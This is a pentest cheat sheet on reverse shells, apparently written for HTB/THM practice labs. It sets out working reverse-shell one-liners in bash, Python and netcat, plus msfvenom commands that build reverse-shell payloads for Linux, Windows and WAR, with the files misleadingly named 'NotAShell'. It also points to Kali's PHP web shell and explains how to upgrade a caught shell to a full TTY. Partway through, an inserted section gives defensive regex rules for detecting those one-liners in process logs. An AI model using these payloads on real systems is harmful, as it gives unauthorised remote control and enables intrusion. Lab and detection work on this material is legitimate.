# Reverse Shell

## Caveats

* **Port choice**
  * Use any open port from nmap scan.
  * For HTB/THM, you can assume port 443 works for a reverse shell.
* **Staged vs. non-staged payloads**
  * Try staged payloads first.
  * If it does not work, try non-staged payloads.

## PHP Reverse Shell

Kali Linux comes with this built-in PHP reverse shell:

```
/usr/share/webshells/php/php-reverse-shell.php
```

Change `$ip` and `$port` before using it:

![php-reverse-shell.php](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWVjG_njKgBtvmnKaJh%2F-MXDqGokS7k4KBsWCXKg%2F-MXDqLCUgSFWfjF0b2HR%2Fimage.png?alt=media\&token=c5abecc9-3eb5-48f7-8546-6ee12b6a1fdb)

For convenience, edit `~/.zshrc` (or `~/.bashrc`) and create an **alias** that copies this payload to the current working directory:

```bash
alias php-reverse-shell="cp /usr/share/webshells/php/php-reverse-shell.php ."
```

## One-Liners

### Bash

```bash
bash -i >& /dev/tcp/<local_ip>/443 0>&1
```

### Python

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
```

### Netcat

```bash
nc -e /bin/sh <local_ip> 443
```

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <local_ip> 443 >/tmp/f
```
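The detection-side counterpart to these one-liners, added here as an example and not part of the original cheat sheet: each of the four commands above leaves a distinctive token pair in the process command line (`/dev/tcp/<ip>/<port>`, `socket.socket(` together with `dup2(`, `nc -e /bin/sh`, `mkfifo ... | nc`), which a small rule set can pick out of execve telemetry. The `cmdline=` log layout, the rule names and the sample log lines are constructed for this example.

```python
import re

# Each rule pairs a name with the token pattern that one of the one-liners
# above leaves in a process command line and that benign usage rarely does.
RULES = {
    # bash -i >& /dev/tcp/<ip>/<port> 0>&1
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+"),
    # python: socket.socket(...).connect(...) followed by os.dup2 onto fds 0-2
    "python_socket_dup2": re.compile(r"socket\.socket\(.*dup2\(", re.S),
    # nc -e /bin/sh <ip> <port> (also ncat/netcat, and -e folded into other flags)
    "nc_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[a-z]*e\s+/bin/(?:ba)?sh\b"),
    # mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <ip> <port> >/tmp/f
    "mkfifo_nc_pipe": re.compile(r"mkfifo\s+\S+.*\|\s*(?:nc|ncat|netcat)\b"),
}

def classify(cmdline: str):
    """Return the first matching rule name, or None when nothing matches."""
    for name, pattern in RULES.items():
        if pattern.search(cmdline):
            return name
    return None

def scan(log_lines):
    """Return (rule, cmdline) for log lines whose cmdline matches a rule.
    Assumed layout: 'key=value ... cmdline=<rest of line>'; adapt the split.
    """
    hits = []
    for line in log_lines:
        if "cmdline=" not in line:
            continue
        cmd = line.split("cmdline=", 1)[1]
        rule = classify(cmd)
        if rule:
            hits.append((rule, cmd))
    return hits

# Constructed sample telemetry; 192.0.2.0/24 is a documentation-only range.
SAMPLE_LOG = [
    "uid=33 comm=bash cmdline=bash -i >& /dev/tcp/192.0.2.10/443 0>&1",
    "uid=33 comm=python3 cmdline=python3 -c 'import socket,os;s=socket.socket();"
    "s.connect((\"192.0.2.10\",443));os.dup2(s.fileno(),0)'",
    "uid=33 comm=sh cmdline=nc -e /bin/sh 192.0.2.10 443",
    "uid=33 comm=sh cmdline=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.0.2.10 443 >/tmp/f",
    "uid=1000 comm=nc cmdline=nc -zv 192.0.2.20 443",  # benign port check
    "uid=1000 comm=python3 cmdline=python3 -c 'import socket;print(socket.gethostname())'",
    "uid=1000 comm=bash cmdline=bash -c 'mkfifo /tmp/p; cat /tmp/p | grep ERROR'",
]
```

`scan(SAMPLE_LOG)` returns four hits, one per one-liner, and nothing for the three benign `uid=1000` lines; the rules are deliberately tied to the exact shapes above, so a renamed binary or an alternative interpreter needs its own rule.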

## Msfvenom

### Linux

```bash
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f elf > NotAShell.elf
```

### Windows

```bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f exe > NotAShell.exe
```

### WAR

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=443 -f war > NotAShell.war
```

## Fully Interactive TTY Shell

**Step 1 is sufficient in most scenarios.** If you plan to use tools like **Vim** during privesc, complete all three steps.

### Step 1: upgrade to TTY shell

In the **remote** shell, upgrade the shell to TTY:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

### Step 2: export terminal environment variables

In your **local** shell, check the environment variable `$TERM`:

```bash
$ echo $TERM
xterm-256color
```

In the **remote** shell, export the environment variables `$TERM` and `$SHELL`:

```bash
export TERM=xterm-256color
export SHELL=/bin/bash
```

### Step 3: set up terminal size

In your **local** shell, check terminal **rows** and **columns**:

```bash
$ stty size
36 145
```

In the **remote** shell, press **ctrl+z** to send the current session to the **background**:

```bash
^Z
[1]+  Stopped        nc -nlvp 443
```

Now you are brought back to the **local** shell. Bring the reverse shell to **foreground**:

```bash
$ stty raw -echo;fg
nc -nlvp 443
$                reset
```

Adjust the **terminal size**:

```bash
$ stty rows 36 columns 145
```

## Reference

{% embed url="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" %}
reverse shell cheat sheet - pentestmonkey.net
{% endembed %}

{% embed url="https://netsec.ws/?p=331" %}
Creating Metasploit Payloads
{% endembed %}

{% embed url="https://www.metahackers.pro/upgrade-shell-to-fully-interactive-tty-shell/" %}
Upgrade shell to full interactive TTY shell
{% endembed %}
